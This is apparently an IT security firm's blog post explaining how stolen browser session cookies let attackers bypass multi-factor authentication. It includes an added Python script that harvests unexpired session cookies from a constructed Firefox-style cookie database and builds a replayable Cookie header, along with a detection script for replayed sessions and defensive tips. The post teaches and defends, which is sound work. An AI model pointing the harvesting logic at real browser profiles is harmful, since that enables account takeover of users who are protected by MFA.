Although multi-factor authentication (MFA) reduces the attack surface by preventing criminals who hold stolen user credentials from logging on, it is possible to steal cookies from current or recent web sessions and use them to bypass MFA altogether.

How is it Possible?

Browser cookies let a web application store a reference to an authenticated session, so a user can stay signed in instead of supplying their username and password every time they open a new page on the site. This is convenient for users who keep a session open for long periods, but that convenience is paid for in security: whoever holds the cookie holds the session.

Attackers exploit this by stealing the session cookie itself rather than the password, which lets them skip the login challenge entirely.
Behind the scenes, browsers keep their cookies in SQLite database files. Each row is a key-value pair (the cookie name and its value) together with metadata such as the host, path and expiry date, and the value is often a session or bearer token. Firefox stores the values in plaintext; Chrome encrypts the value column, but with a key that code running as the same OS user can recover (on Windows it is protected with DPAPI, which decrypts for any process in that user's context).

If MFA is enabled, the user has to provide additional proof of identity, such as approving a push notification on their mobile device. Once the user has passed MFA, the application issues a session cookie that the browser stores for that web session, and MFA is not requested again while that cookie is valid. The vulnerability follows directly: anyone who can extract the right browser cookie can present it from a completely separate browser session on another system and be treated as that user. In short, the cookie lets them bypass MFA without ever being challenged.

The attack is easy to script because the names and locations of the cookie databases for Chrome, Firefox and the other major browsers are well known on every operating system (for example cookies.sqlite in a Firefox profile and the Cookies file in a Chrome profile). Such modules are commonly bundled into info-stealing and other malware. To gain initial access, attackers also run phishing and spear-phishing campaigns that plant droppers which deploy the cookie stealer without the end user's knowledge.
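The following script, added here as an illustration and not taken from the article or from any real stealer, shows the mechanics described above: it builds a constructed cookie store in a temporary directory, modelled on Firefox's cookies.sqlite with a simplified subset of its moz_cookies columns (an assumption, the real table has more), then harvests the unexpired cookies for one target host and assembles the Cookie header an attacker would replay from another machine. Hostnames, cookie names and values are invented.

```python
"""Added example (not from the original article): how a stealer harvests
session cookies from a browser's on-disk SQLite cookie store.
The database is CONSTRUCTED in a temp dir and modelled on Firefox's
cookies.sqlite, using only a subset of the real moz_cookies columns
(assumption). Chrome's store is similar, but its value column is encrypted
with a user-scoped key. Hosts, cookie names and values are made up."""
import os
import sqlite3
import tempfile
import time

# Simplified subset of Firefox's moz_cookies table; the real one has more columns.
SCHEMA = """
CREATE TABLE moz_cookies (
    id         INTEGER PRIMARY KEY,
    host       TEXT,
    name       TEXT,
    value      TEXT,
    path       TEXT,
    expiry     INTEGER,   -- unix seconds; 0 marks a session-only cookie
    isSecure   INTEGER,
    isHttpOnly INTEGER
);
"""


def build_sample_store(path: str, now: int) -> None:
    """Write a constructed cookie store resembling what is left on disk after an
    MFA-protected login (all values are invented)."""
    rows = [
        # host, name, value, path, expiry, isSecure, isHttpOnly
        (".portal.example", "SESSIONID", "f3c1e9d2a7", "/", now + 8 * 3600, 1, 1),  # post-MFA session
        (".portal.example", "_csrf", "a1b2c3", "/", now + 8 * 3600, 1, 0),
        (".portal.example", "old_session", "dead", "/", now - 60, 1, 1),  # expired, worthless
        (".shop.example", "cart", "42", "/", now + 86400, 0, 0),  # other site, not targeted
    ]
    conn = sqlite3.connect(path)
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO moz_cookies (host, name, value, path, expiry, isSecure, isHttpOnly)"
        " VALUES (?, ?, ?, ?, ?, ?, ?)",
        rows,
    )
    conn.commit()
    conn.close()


def harvest(path: str, host_suffix: str, now: int) -> list[dict]:
    """Read the unexpired cookies for one target domain, as a stealer would.
    Real tooling usually copies the file first, because a running browser may
    hold a lock on it; a read-only open is enough for the copy."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    conn.row_factory = sqlite3.Row
    rows = conn.execute(
        "SELECT host, name, value, path, expiry, isSecure, isHttpOnly"
        " FROM moz_cookies"
        " WHERE host LIKE ? AND (expiry = 0 OR expiry > ?)"
        " ORDER BY id",
        (f"%{host_suffix}", now),
    ).fetchall()
    conn.close()
    return [dict(r) for r in rows]


def cookie_header(cookies: list[dict]) -> str:
    """Build the Cookie request header to replay from another machine.
    HttpOnly and Secure only constrain a browser; they mean nothing once the
    value has been read straight from disk."""
    return "; ".join(f"{c['name']}={c['value']}" for c in cookies)


def demo() -> str:
    """End to end: create the constructed store, harvest portal.example, build the header."""
    now = int(time.time())
    with tempfile.TemporaryDirectory() as tmp:
        db = os.path.join(tmp, "cookies.sqlite")
        build_sample_store(db, now)
        return cookie_header(harvest(db, "portal.example", now))


if __name__ == "__main__":
    print(demo())  # SESSIONID=f3c1e9d2a7; _csrf=a1b2c3
```

The expired `old_session` row is filtered out because it is useless to the attacker, and the unrelated `shop.example` cookie is ignored; everything the harvester needs is in the file, which is why the attack still works after the browser has been closed and without any knowledge of the user's password.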

How Can You Protect Your System from Such Attacks?

Pass-the-Cookie attacks are a serious threat for a few reasons.

  • A Pass-the-Cookie attack does not require administrative rights: every user can read and decrypt their own browser cookies, whether or not they have privileged rights on their workstation, so malware running as that user can too.
  • The attacker doesn’t need the compromised account’s user ID or password, so the attack works with minimal information about the victim.
  • A Pass-the-Cookie attack can be carried out after the browser has been closed, because persistent cookies stay on disk until they expire or are deleted.

Steps You Can Take

There are a few ways of minimizing your overall risk:

  • Do not use built-in browser features to save passwords unless the browser encrypts them with at least a master password.
  • Uncheck the “remember passwords” and “remember me” settings, and avoid persistent sessions where the application offers the choice.
  • Configure the browser to delete all cookies automatically when it closes, so a session cookie does not outlive the browser.
  • Implement authentication monitoring and threat detection that flags a session token being used from a new device, IP address or user agent.
  • Use a hardened web browser.
  • Use a (preferably offline) password manager.
  • Be careful which links you click, since phishing is the usual delivery path for cookie stealers.
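As an added example of the authentication monitoring step above (this is illustrative code written for this page, not a product or the article's own tooling), the script below runs two checks over constructed web-application auth logs: a session id presented from a different client fingerprint (IP address and user agent) than the one that passed MFA, and a session id used after the user logged out. The log lines and their field layout are made up for the example.

```python
"""Added example (not from the original article) for the authentication
monitoring bullet above: server-side detection of a replayed session cookie.
The log lines and their field layout are CONSTRUCTED for this example and do
not correspond to any product's format."""
import re

# Constructed application auth log: timestamp, event, user, session id, client ip, user agent.
LOG = """\
2024-03-04T08:00:01Z login_mfa_ok alice sid=9f2a ip=203.0.113.10 ua=Firefox/123
2024-03-04T08:05:13Z request alice sid=9f2a ip=203.0.113.10 ua=Firefox/123
2024-03-04T08:40:22Z request alice sid=9f2a ip=198.51.100.77 ua=python-requests/2.31
2024-03-04T08:45:00Z logout alice sid=9f2a ip=203.0.113.10 ua=Firefox/123
2024-03-04T09:00:00Z login_mfa_ok bob sid=c4d1 ip=203.0.113.20 ua=Chrome/122
2024-03-04T09:01:10Z request bob sid=c4d1 ip=203.0.113.20 ua=Chrome/122
2024-03-04T09:30:41Z request alice sid=9f2a ip=198.51.100.77 ua=python-requests/2.31
"""

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<event>\S+) (?P<user>\S+) sid=(?P<sid>\S+) ip=(?P<ip>\S+) ua=(?P<ua>.+)$"
)


def parse(log: str) -> list[dict]:
    """Turn the constructed log into dicts; lines that do not match are skipped."""
    out = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            out.append(m.groupdict())
    return out


def detect_session_replay(log: str) -> list[dict]:
    """Flag a session id presented from a client fingerprint (ip, user agent)
    other than the one that passed MFA, and any use of a session after logout.
    Assumption: the app logs one line per request with these fields. Session ids
    with no observed login are left alone, to avoid noise at log window edges."""
    baseline = {}   # sid -> (ip, ua) captured when MFA succeeded
    ended = set()   # sids that have been logged out
    alerts = []
    for ev in parse(log):
        sid, fp = ev["sid"], (ev["ip"], ev["ua"])
        if ev["event"] == "login_mfa_ok":
            baseline[sid] = fp
            ended.discard(sid)
            continue
        if ev["event"] == "logout":
            ended.add(sid)
            continue
        if sid in ended:
            alerts.append({**ev, "reason": "session used after logout"})
        elif sid in baseline and baseline[sid] != fp:
            alerts.append({**ev, "reason": f"client changed from {baseline[sid]} to {fp}"})
    return alerts


if __name__ == "__main__":
    for a in detect_session_replay(LOG):
        print(a["ts"], a["user"], a["sid"], a["reason"])
```

On this input the 08:40 request (same cookie, new IP and a scripting user agent) and the 09:30 request (cookie replayed after logout) are raised; bob's session is clean. IP changes alone produce false positives on mobile and roaming corporate networks, so treat a user-agent change as the stronger signal, and pair this monitoring with the short session lifetimes and cookie-clearing settings listed above so that a stolen cookie has as little time to be useful as possible.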

Most people deploying and using MFA are inclined to think of it as a fix-all that stops them being hacked, which is simply untrue. Believing that MFA makes you unhackable is more dangerous than not using MFA at all.

One of the best ways to stay on top of your IT security is to partner with a known cybersecurity expert that can help manage your overall IT infrastructure and help you see all possible threat vectors. Partnering with an expert like Natural Networks can help keep your IT defenses up, so you can focus on what’s important in your work. If you’re interested in learning more about how Natural Networks can help you achieve IT peace of mind, give us a call today!